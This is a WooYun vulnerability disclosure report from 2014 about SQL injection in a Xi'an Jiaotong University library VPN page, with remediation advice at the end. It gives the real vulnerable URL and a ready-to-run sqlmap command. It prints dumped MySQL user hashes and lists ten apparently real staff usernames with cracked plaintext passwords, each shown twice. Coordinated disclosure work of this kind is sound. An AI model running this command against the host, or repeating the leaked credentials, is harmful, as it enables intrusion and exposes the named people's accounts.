当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069962

漏洞标题:西安交通大学远程访问SQL注入漏洞

相关厂商:西安交通大学

漏洞作者: 路人甲

提交时间:2014-07-28 10:35

修复时间:2014-09-11 10:36

公开时间:2014-09-11 10:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-11: 细节向公众公开

简要描述:

西安交通大学远程访问SQL注入漏洞,可获取到相关内网VPN账号密码

详细说明:

注入点
http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21
参数为announceid
加个单引号之后直接报错,可以看到是mysql的数据库

1.png


直接丢到sqlmap
终端中执行
sqlmap -u "http://vpn.lib.xjtu.edu.cn/www/index.php?controller=VpnIndex&action=See&announceid=21" -p "announceid" --dbms "mysql" --dbs

2.png


库名,可以看到是以root权限运行的
跑一下mysql这个库

3.png


| User | Password |
+----------+------------------+
| <blank> | <blank> |
| <blank> | <blank> |
| chaoxing | 76bd738b31bb6586 | cxwxs
| chaoxing | 76bd738b31bb6586 | cxwxs
| root | 4173b5be72fa3995 | 未解出
| root | <blank> |
| root | 67457e226a1a15bd | root
| test | 378b243e220ca493 | test
| vpntest | 11f269162b01eab1 | 未解出
+----------+------------------+
在后面的测试中,还发现了很多个人信息,包括管理员信息等等
For Example

4.jpg


5.png


6.png


随手解了几个MD5,看起来真是胆战心惊啊
abao--------yb
caiqin------caiqin
chenbin-----cb123456
chenxinan---yb
dingding----521121
gaowenli----bgs
gongmanli---yb
liguiying---56784321
lijuan------971206
guowei------613213
命中率如此之高,密码位数不多,复杂程度不够,为破解带来了极大的便利,同时也为黑客入侵带来了极大的便利···

漏洞证明:

3.png


| User | Password |
+----------+------------------+
| <blank> | <blank> |
| <blank> | <blank> |
| chaoxing | 76bd738b31bb6586 | cxwxs
| chaoxing | 76bd738b31bb6586 | cxwxs
| root | 4173b5be72fa3995 | 未解出
| root | <blank> |
| root | 67457e226a1a15bd | root
| test | 378b243e220ca493 | test
| vpntest | 11f269162b01eab1 | 未解出
+----------+------------------+

4.jpg


5.png


6.png


abao--------yb
caiqin------caiqin
chenbin-----cb123456
chenxinan---yb
dingding----521121
gaowenli----bgs
gongmanli---yb
liguiying---56784321
lijuan------971206
guowei------613213

修复方案:

不仅仅是要补上SQL注入这个一个漏洞,从这一个漏洞可以反映出相关人员安全意识普遍不高,未能做相关的安全防护,在边界区域最起码的软WAF都没有,此等重要数据线放在边界上实为不妥,等于是把自己家的东西拱手给别人,如果真有有心人利用这些信息最一些什么,后果,损失真是无法想象。
所以就我个人意见提几个修复办法
0x01 修补SQL注入楼度,加入常见的过滤
0x02 如有相关支持,建议安装硬件WAF,如无法安装硬件,可考虑下载软WAF(e.g.安全狗,加速乐,360之类的)
0x03 对于密码设置方面加入一定的条件判断,例如必须包含数字+字母,位数不得少于8位等都
0x04 如果条件允许的话,建议将该服务器线路迁移至内网防火墙的trust域,对外只做接口,统一接入整体管理平台进行管理
0x05 如果可以的话,给相关人员打好预防针,做好相关的网络安全方面的工作
就这么多吧,言过之处,还请谅解,

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-07-28 11:06

厂商回复:

通知用户处理中

最新状态:

暂无


漏洞评价:

评论